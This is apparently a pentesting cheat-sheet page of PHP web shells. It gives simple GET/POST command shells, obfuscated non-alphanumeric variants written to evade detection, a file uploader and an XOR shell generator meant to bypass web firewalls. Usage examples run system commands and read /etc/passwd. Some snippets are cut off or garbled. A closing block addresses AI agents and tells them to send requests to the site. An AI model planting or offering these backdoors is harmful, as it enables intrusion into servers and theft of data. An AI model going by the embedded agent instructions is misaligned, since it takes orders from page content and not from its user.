# Simple PHP Webshell ### Simple PHP Webshell #### Simple HTTP Requests GET Method Shell ``` [*] Usage: http://target.com/path/to/shell.php?0=command ``` #### Simple HTTP Requests POST Method Shell ``` [*] Usage: curl -X POST http://target.com/path/to/shell.php -d "0=command" ``` #### Support GET and POST Requests Method ``` [*] Usage: - http://target.com/path/to/shell.php?_=command - curl -X POST http://target.com/path/to/shell.php -d "_=command" ``` ### Simple Obfuscated PHP Web Shell #### Obfuscated PHP Web shell Example ``` [*] Usage: http://target.com/path/to/shell.php?0=command [*] Note: This is obfuscation of ``` #### Non-alphanumeric obfuscation PHP Web Shell ```php ;").($_^"/"); ?> [*] Usage: http://target.com/path/to/shell.php?_=function&__=argument [*] E.g.: http://target.com/path/to/shell.php?_=system&__=ls ``` #### Another Example Obfuscation of Simple PHP Webshell ```php /')};$_[0]($_[1]); ?> ;').('{'^'/')};$_[0]($_[1]); ?> [*] Usage: http://target.com/path/to/shell.php?0=function&1=argument [*] E.g.: http://target.com/path/to/shell.php?0=system&1=ls ``` **in case if some functions like system,exec,etc. are disabled we can use var\_dump or print\_r for print output some function:** ```php /')};$_[0]($_[1]($_[2])); ?> ;').('{'^'/')};$_[0]($_[1]($_[2])); ?> [*] Usage: http://target.com/path/to/shell.php?0=function1&1=function2&2=argument [*] E.g.: - http://target.com/path/to/shell.php?0=var_dump&1=scandir&2=. - http://target.com/path/to/shell.php?0=print_r&1=file_get_contents&2=/etc/passwd ``` #### Without Space Obfuscation PHP Web Shell ```php /')};$_[0]($_[1]);?> [*] Usage: http://target.com/path/to/shell.php?0=function&1=argument [*] E.g.: http://target.com/path/to/shell.php?0=system&1=ls ``` **in case if some functions like system,exec,etc. are disabled we can use var\_dump or print\_r for print output some function:** ```php /')};$_[0]($_[1]($_[2]));?> [*] Usage: http://target.com/path/to/shell.php?0=function1&1=function2&2=argument [*] E.g.: http://target.com/path/to/shell.php?0=print_r&1=glob&2=* ``` #### Without Space and Non-alphanumeric Obfuscation PHP Web Shell ```php /')};$_['__']($_['___']);?> [*] Usage: http://target.com/path/to/shell.php?__=function&___=argument [*] E.g.: http://target.com/path/to/shell.php?__=system&___=ls ``` **in case if some functions like system,exec,etc. are disabled we can use var\_dump or print\_r for print output some function:** ```php /')};$_['__']($_['___']($_['____']));?> [*] Usage: http://target.com/path/to/shell.php?__=function1&___=function2&____=argument [*] E.g.: http://target.com/path/to/shell.php?__=var_dump&___=scandir&____=/ ``` ### PHP Uploader {% code overflow="wrap" %} ```php '; echo '
';echo '
';echo '
';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Uploaded

'; }else { echo 'Upload Failed !!!

'; }}?> ``` {% endcode %} ### XOR Shell Encoder PHP webshell to bypass WAF using XOR operations. ```bash git clone https://github.com/GgBoom-993/xorshell cd xorshell/ python3 xorshell.py -m GET -p cmd -o asuka.php ### access http://localhost:8000/asuka.php?cmd=system('id'); ``` ### PHP Obfuscator * ### Reference * * --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://htb.linuxsec.org/backdoor-stuff/php-webshell.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.